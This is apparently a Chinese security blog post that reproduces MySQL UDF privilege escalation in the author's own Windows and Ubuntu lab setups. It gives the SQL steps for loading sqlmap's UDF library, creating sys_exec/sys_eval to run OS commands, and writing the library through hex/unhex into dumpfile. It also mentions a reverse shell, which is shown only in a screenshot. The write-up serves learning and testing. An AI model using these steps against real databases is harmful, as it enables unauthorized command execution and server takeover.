
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>udf提权复现 | 离怀秋</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Windows平台UDFUDF（user defined function）用户自定义函数，是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能，其添加的新函数都可以在sql语句中调用，就像调用本机函数一样。  如果mysql版本大于5.1，udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下&#x2F; 如果mysql版本小于5.1， udf.dl">
<meta property="og:type" content="article">
<meta property="og:title" content="udf提权复现">
<meta property="og:url" content="http://yoursite.com/2019/06/01/udf%E6%8F%90%E6%9D%83%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="离怀秋">
<meta property="og:description" content="Windows平台UDFUDF（user defined function）用户自定义函数，是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能，其添加的新函数都可以在sql语句中调用，就像调用本机函数一样。  如果mysql版本大于5.1，udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下&#x2F; 如果mysql版本小于5.1， udf.dl">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2roegm93qj31b20kk42f.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rof0vr2oj31br0p748q.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rof7zhe5j30xt0fkwgb.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rofick8bj30i704njsr.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rogc1rn0j30o305zjsy.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rofz1u1bj31b30d4wn1.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpggy1g2rogmzfv7j316f06tdkv.jpg">
<meta property="article:published_time" content="2019-06-01T08:22:41.000Z">
<meta property="article:modified_time" content="2019-06-01T08:24:14.000Z">
<meta property="article:author" content="离怀秋">
<meta property="article:tag" content="Web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2roegm93qj31b20kk42f.jpg">
  
    <link rel="alternative" href="/atom.xml" title="离怀秋" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
<link rel="stylesheet" href="/css/style.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">离怀秋</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">心未死 战未败</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
          <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="Search">
          <input type="submit" value="" class="search-form-submit">
          <input name=tn type=hidden value="bds">
          <input name=cl type=hidden value="3">
          <input name=ct type=hidden value="2097152">
          <input type="hidden" name="si" value="yoursite.com">
        </form>
      </div>
    </div>
  </div>
</header>
    <div class="outer">
      <section id="main"><article id="post-udf提权复现" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/06/01/udf%E6%8F%90%E6%9D%83%E5%A4%8D%E7%8E%B0/" class="article-date">
  <time datetime="2019-06-01T08:22:41.000Z" itemprop="datePublished">2019-06-01</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      udf提权复现
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="Windows平台"><a href="#Windows平台" class="headerlink" title="Windows平台"></a>Windows平台</h2><h3 id="UDF"><a href="#UDF" class="headerlink" title="UDF"></a>UDF</h3><p>UDF（user defined function）用户自定义函数，是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能，其添加的新函数都可以在sql语句中调用，就像调用本机函数一样。</p>
<ul>
<li>如果mysql版本大于5.1，udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/</li>
<li>如果mysql版本小于5.1， udf.dll文件在windows server 2003下放置于c:\windows\system32目录，在windows server 2000下放置在c:\winnt\system32目录。</li>
<li>掌握mysql数据库的账户，从拥有对mysql的insert和delete权限，以创建和抛弃函数。</li>
<li>拥有可以将udf.dll写入相应目录的权限。</li>
</ul>
<p>这里我用的是phpstudy上的mysql作为对象，udt提权所需的文件在sqlmap上是有的，因为sqlmap也能udf提权，大多数mysql是32位的，udf.dll所用的是异或编码，使用前需要进行解码<code>cloak.py</code>,解码完毕后会在当前目录生成你所需的文件</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2roegm93qj31b20kk42f.jpg" alt=""></p>
<p>成功生成所需提权文件，然后将文件放到Mysql下<code>lib/plugin</code>目录下，在mysql执行创建函数命令，</p>
<p>命令格式为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">create function you_want returns string soname &quot;lib_mysqludf_dll&quot;;</span><br></pre></td></tr></table></figure>

<p>例如我可以通过创建sys_exec命令执行函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">create function sys_exec returns string soname &quot;lib_mysqludt_dll&quot;;</span><br><span class="line">select sys_exec(&#39;calc&#39;); 调用函数</span><br></pre></td></tr></table></figure>

<p>成功弹出计算器</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rof0vr2oj31br0p748q.jpg" alt=""></p>
<p>udf.dll是16进制文件，我们可以用winhex查看可用函数</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rof7zhe5j30xt0fkwgb.jpg" alt=""></p>
<p>这些都为可调用函数</p>
<h2 id="Linux下udf提权"><a href="#Linux下udf提权" class="headerlink" title="Linux下udf提权"></a>Linux下udf提权</h2><p>其实linux下提权套路相同，只不过两个平台下提权方法都各种两种，第一种是提取文件的16进制形式生成新的16进制，第二就是用cloak.py去解码异或编码文件，先解决一下简单的方法</p>
<p><strong>测试环境Ubuntu18.04</strong></p>
<p>同样利用sqlmap  <code>python cloak.py -d -i &lt;文件&gt;</code> 得到以.so(linux下与window不同之处.dll与.so)，将这个文件同样放到/lib/plugin目录下</p>
<p>同样操作</p>
<p>create function sys_eval returns string soname “lib_mysqludf_so”</p>
<p>select sys_eval(‘whoami’);</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rofick8bj30i704njsr.jpg" alt=""></p>
<p>得到mysql权限，在Ubuntu下一定要以root权限启动，否则在查询<code>whoami</code>时返回Null</p>
<p>检查一下此时的函数功能都有哪些</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rogc1rn0j30o305zjsy.jpg" alt=""></p>
<p>通过探测发现我们可以通过这个功能进行反弹shell</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g2rofz1u1bj31b30d4wn1.jpg" alt=""></p>
<p>成功反弹shell</p>
<p>而且在mysql&gt;5.1版本下可以执行system语句</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpggy1g2rogmzfv7j316f06tdkv.jpg" alt=""></p>
<p>最后在介绍一下我在linux下未成功的16进制写入，感觉这个方法就比较麻烦了，还要拥有Mysql下的写入写出权限</p>
<p>流程如下</p>
<p>将sqlmap里面的文件转化为16进制写入临时目录下的udf.txt文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select hex(load_file(&#39;&#x2F;pentest&#x2F;database&#x2F;sqlmap&#x2F;udf&#x2F;mysql&#x2F;linux&#x2F;64&#x2F;lib_mysqludf_sys.so&#39;)) into outfile &#39;&#x2F;tmp&#x2F;udf.txt&#39;;</span><br></pre></td></tr></table></figure>

<p>将udf.txt文件中的16进制形式用unhex去解码并转到/lib/plugin目录下的udf.so</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select unhex(&#39;7F454C46020...&#39;) into dumpfile &#39;&#x2F;usr&#x2F;lib&#x2F;mysql&#x2F;plugin&#x2F;mysqludf.so&#39;;</span><br></pre></td></tr></table></figure>

<p>之后的操作正常进行，不过不知什么原因udf.txt的内容在我的Ubuntu下一直为空</p>

      
    </div>
    <footer class="article-footer">
      
        <a data-url="http://yoursite.com/2019/06/01/udf%E6%8F%90%E6%9D%83%E5%A4%8D%E7%8E%B0/" data-id="ckabsu38z0032kkvrf01h2i51" class="article-share-link" data-share="baidu" data-title="udf提权复现">Share</a>
      

      
        <a href="http://yoursite.com/2019/06/01/udf%E6%8F%90%E6%9D%83%E5%A4%8D%E7%8E%B0/#ds-thread" class="article-comment-link">Comments</a>
      

      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/06/01/hash%E9%95%BF%E5%BA%A6%E6%89%A9%E5%B1%95%E6%94%BB%E5%87%BB/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          hash长度扩展攻击
        
      </div>
    </a>
  
  
</nav>

  
</article>


  <section id="comments">
    <div id="ds-thread" class="ds-thread" data-thread-key="2019/06/01/udf提权复现/" data-title="udf提权复现" data-url="http://yoursite.com/2019/06/01/udf%E6%8F%90%E6%9D%83%E5%A4%8D%E7%8E%B0/"></div>
  </section>
</section>
      
      <aside id="sidebar">
  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">30</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Crypto/" rel="tag">Crypto</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%E5%AE%89%E5%85%A8/" rel="tag">WEB安全</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a><span class="tag-list-count">7</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a><span class="tag-list-count">26</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xss/" rel="tag">xss</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%94%9F%E6%B4%BB%E9%9A%8F%E7%AC%94/" rel="tag">生活随笔</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9A%8F%E7%AC%94/" rel="tag">随笔</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Crypto/" style="font-size: 12.5px;">Crypto</a> <a href="/tags/WEB%E5%AE%89%E5%85%A8/" style="font-size: 10px;">WEB安全</a> <a href="/tags/Web/" style="font-size: 15px;">Web</a> <a href="/tags/Web%E5%AE%89%E5%85%A8/" style="font-size: 17.5px;">Web安全</a> <a href="/tags/XSS/" style="font-size: 10px;">XSS</a> <a href="/tags/xss/" style="font-size: 10px;">xss</a> <a href="/tags/%E7%94%9F%E6%B4%BB%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">生活随笔</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">随笔</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">January 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a><span class="archive-list-count">21</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/05/13/Apache-Common-Collections-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/">Apache Common Collections 反序列化分析学习</a>
          </li>
        
          <li>
            <a href="/2020/05/12/intigriti-Easter-XSS-challenge/">intigriti Easter XSS challenge</a>
          </li>
        
          <li>
            <a href="/2020/04/22/VolgaCTF-2020-Qualifier-Web/">VolgaCTF 2020 Qualifier-Web</a>
          </li>
        
          <li>
            <a href="/2020/04/15/DOM-Clobbering-Attack/">DOM Clobbering Attack</a>
          </li>
        
          <li>
            <a href="/2020/04/09/Javascript%E4%B8%AD%E5%8F%98%E9%87%8F%E5%A3%B0%E6%98%8E%E5%B8%A6%E6%9D%A5%E7%9A%84Tags-Broken/">Javascript中变量声明带来的Tags Broken</a>
          </li>
        
      </ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Links</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="http://arvinxiang.com" target="_blank">主题作者</a>
          </li>
        
          <li>
            <a href="http://reqianduan.com" target="_blank">热前端</a>
          </li>
        
          <li>
            <a href="http://yuancheng.work" target="_blank">远程.work</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
      
    </div>
    <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 离怀秋<br>
      Powered by <a href="//hexo.io/" target="_blank">Hexo</a>
      .
      Theme by <a href="https://github.com/xiangming/landscape-plus" target="_blank">Landscape-plus</a>
    </div>
  </div>
</footer>
  </div>
  <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
  <!-- totop start -->
<div id="totop">
<a title="totop"><img src="/img/scrollup.png"/></a>
</div>

<!-- totop end -->

<!-- 多说公共js代码 start -->
<script type="text/javascript">
var duoshuoQuery = {short_name:"reqianduan"};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0]
     || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
  </script>
<!-- 多说公共js代码 end -->


<!-- 百度分享 start -->

<div id="article-share-box" class="article-share-box">
  <div id="bdshare" class="bdsharebuttonbox article-share-links">
    <a class="article-share-weibo" data-cmd="tsina" title="分享到新浪微博"></a>
    <a class="article-share-weixin" data-cmd="weixin" title="分享到微信"></a>
    <a class="article-share-qq" data-cmd="sqq" title="分享到QQ"></a>
    <a class="article-share-renren" data-cmd="renren" title="分享到人人网"></a>
    <a class="article-share-more" data-cmd="more" title="更多"></a>
  </div>
</div>
<script>
  function SetShareData(cmd, config) {
    if (shareDataTitle && shareDataUrl) {
      config.bdText = shareDataTitle;
      config.bdUrl = shareDataUrl;
    }
    return config;
  }
  window._bd_share_config={
    "common":{onBeforeClick: SetShareData},
    "share":{"bdCustomStyle":"/css/bdshare.css"}
  };
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

<!-- 百度分享 end -->

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>





<script src="/js/script.js"></script>


</div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":200,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
